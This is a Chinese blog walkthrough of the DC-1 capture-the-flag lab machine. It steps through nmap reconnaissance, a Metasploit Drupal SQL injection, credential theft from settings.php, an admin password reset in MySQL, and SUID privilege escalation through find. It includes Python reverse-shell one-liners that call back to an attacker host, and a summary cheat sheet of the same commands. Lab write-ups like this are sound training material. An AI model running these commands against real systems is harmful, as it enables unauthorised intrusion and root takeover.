码迷,mamicode.com
首页 > 其他好文 > 详细

DC-1靶机Walkthrough

时间:2020-05-10 14:59:46      阅读:100      评论:0      收藏:0      [点我收藏+]

标签:初步   ash   file   断网   执行文件   交互式   结束   framework   robot   

DC~1: WalkThrough

技术图片



信息收集

主机发现

nmap -sP 10.0.0.1/24 --system-dns | grep 10.0.0. | egrep -v 10.0.0.1 | egrep -v 10.0.0.26 | awk ‘{print $5}‘ >> target.txt

技术图片

端口扫描

nmap --system-dns -T4 -A -iL target.txt

技术图片

查看网站robots.txt

技术图片

从目标网站UPGRADE.txt文件中初步判断网站版本为Drupal 6.x

漏洞利用

metasploit framework

搜索Drupal 6.x漏洞

技术图片

使用3--SQL注入模块

技术图片

运行,获取shell

技术图片

flag1

查看当前目录

技术图片

查看Drupal默认配置文件

技术图片

flag2

查看下载回本地的settings.php,获取flag2和数据库帐号密码

技术图片

flag3

再次进入msf中,使用python获得一个交互式shell

技术图片

登陆mysql

技术图片

技术图片

修改admin密码的hash值,该CMS中自带加密脚本

技术图片

技术图片

修改完成后访问浏览器进行登陆,输入账号:admin;密码:123

技术图片

查看flag3,提示需要使用find命令提权

技术图片

提权

SUID提权,find提权,使用命令查找suid权限的命令

find / -user root -perm -4000 -print 2>/dev/null

技术图片

使用find命令获取root权限的shell,并将其反弹给kali

find flag1.txt -exec python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘10.0.0.26‘,28670));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/sh‘,‘-i‘]);" \;   #需要查找一个已经存在的文件,并且命令末尾为" \;"

技术图片

flag4&flag5

flag5

技术图片

flag4

技术图片

总结

nmap结果过滤

nmap 只打印存活的主机,但不包括本机和网关

nmap -sP 10.0.0.1/24 --system-dns | grep 10.0.0. | egrep -v 10.0.0.1 | egrep -v 10.0.0.26 | awk ‘{print $5}‘ >> target.txt

python 获取shell

python反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘ip‘,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash‘,‘-i‘]);"

python模拟终端

python -c "import pty;pty.spawn(‘/bin/bash‘)"

mysql更新数据

mysql更新指定数据

update users set pass="$$‘,aoeu123" where uid=1;

SUID提权

使用find命令找到具有su权限的可执行文件,一般可用于提权的可执行文件为:Nmap、vim、find、bash、more、less、nano、cp

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

命令执行

find exisit.file -exec "whoami" \;      #需要查找一个存在的文件,exec命令最后使用空格+下划线+分号结束

DC-1靶机Walkthrough

标签:初步   ash   file   断网   执行文件   交互式   结束   framework   robot   

原文地址:https://www.cnblogs.com/zhaoritian12138/p/12863129.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!